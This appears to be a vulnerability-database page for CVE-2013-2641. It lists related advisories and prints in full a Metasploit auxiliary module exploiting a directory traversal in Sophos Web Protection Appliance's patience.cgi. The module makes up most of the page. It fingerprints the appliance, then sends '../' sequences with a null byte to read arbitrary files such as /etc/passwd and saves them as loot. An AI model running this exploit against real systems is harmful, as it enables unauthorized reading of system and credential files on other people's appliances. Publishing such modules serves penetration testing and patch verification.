| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution | 4 Apr 201300:00 | – | zdt | |
| CVE-2013-2641 | 29 May 201815:50 | – | circl | |
| Sophos Web Protection Appliance patience.cgi Directory Traversal (CVE-2013-2641) | 15 Oct 201300:00 | – | checkpoint_advisories | |
| CVE-2013-2641 | 18 Mar 201414:00 | – | cve | |
| CVE-2013-2641 | 18 Mar 201414:00 | – | cvelist | |
| Sophos Web Protection Appliance 3.7.8.1 File Disclosure | 10 Feb 201400:00 | – | dsquare | |
| Sophos Web Protection Appliance 3.7.8.1 RCE | 10 Feb 201400:00 | – | dsquare | |
| Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 201300:00 | – | exploitdb | |
| Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 201300:00 | – | exploitpack | |
| Sophos Web Protection Appliance patience.cgi Directory Traversal | 10 Sep 201304:30 | – | metasploit |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sophos Web Protection Appliance patience.cgi Directory Traversal',
'Description' => %q{
This module abuses a directory traversal in Sophos Web Protection Appliance, specifically
on the /cgi-bin/patience.cgi component. This module has been tested successfully on the
Sophos Web Virtual Appliance v3.7.0.
},
'Author' => [
'Wolfgang Ettlingers', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2013-2641' ],
[ 'OSVDB', '91953' ],
[ 'BID', '58833' ],
[ 'EDB', '24932' ],
[ 'URL', 'https://web.archive.org/web/20130603041204/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx' ],
[ 'URL', 'https://web.archive.org/web/20140701204340/https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt' ]
],
'DefaultOptions' => {
'SSL' => true
},
'DisclosureDate' => '2013-04-03'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal depth', 2])
]
)
end
def my_basename(filename)
return ::File.basename(filename.gsub(/\\/, '/'))
end
def is_proficy?
res = send_request_cgi(
{
'uri' => '/cgi-bin/patience.cgi',
'method' => 'GET'
}
)
if res && (res.code == 307) && res.body =~ (/The patience page request was not valid/)
return true
else
return false
end
end
def read_file(file)
travs = ''
travs << '../' * datastore['DEPTH']
travs << file
travs << '%00'
print_status('Retrieving file contents...')
res = send_request_cgi(
{
'uri' => '/cgi-bin/patience.cgi',
'method' => 'GET',
'encode_params' => false,
'vars_get' => {
'id' => travs
}
}
)
if res && ((res.code == 200) || (res.code == 500)) && res.headers['X-Sophos-PatienceID']
return res.body
else
print_status("#{res.code}\n#{res.body}")
return nil
end
end
def run
print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
if is_proficy?
print_good('Check successful')
else
print_error('Sophos Web Protect Appliance vulnerable component not found')
return
end
contents = read_file(datastore['FILEPATH'])
if contents.nil?
print_error('File not downloaded')
return
end
file_name = my_basename(datastore['FILEPATH'])
path = store_loot(
'sophos.wpa.traversal',
'application/octet-stream',
rhost,
contents,
file_name
)
print_good("File saved in: #{path}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation